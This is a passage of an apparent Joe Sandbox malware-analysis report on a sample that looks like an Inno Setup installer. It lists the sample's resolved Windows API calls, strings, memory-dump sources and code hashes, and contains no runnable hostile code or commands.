                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                            • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                                            • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                            • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                            • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                            • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                            • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                            • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                            • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                            • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2567288614.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.2567221951.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2567385272.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2567288614.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.2567221951.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2567385272.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                              • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                            • API String ID: 1968650500-2910565190
                                                                            • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                            • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                            • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                            • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                            • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                            • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                            • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                            • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                            • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                            • API String ID: 4012871263-351310198
                                                                            • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                            • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                            • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                            • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                            • 74284C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                            • 74286180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                            • 74284C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                            • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                            • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                            • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                            • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                            • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                            • 74284C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                            • 74278830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                            • 742722A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                            • 74278830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                            • 742722A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                            • 74284D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$74284$ObjectSelect$74272274278830Text$742774286180A570DeleteFillRect
                                                                            • String ID:
                                                                            • API String ID: 1476482780-0
                                                                            • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                            • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                            • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                            • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                              • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                            • API String ID: 2000705611-3672972446
                                                                            • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                            • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                            • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                            • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                            • API String ID: 1452528299-3112430753
                                                                            • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                            • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                            • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                            • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 0045CF3E
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                              • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                            • API String ID: 59345061-4263478283
                                                                            • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                            • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                            • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                            • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                            • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                            Strings
                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                            • CoCreateInstance, xrefs: 004565C3
                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                            • IPropertyStore::Commit, xrefs: 00456795
                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                            • IPersistFile::Save, xrefs: 00456814
                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
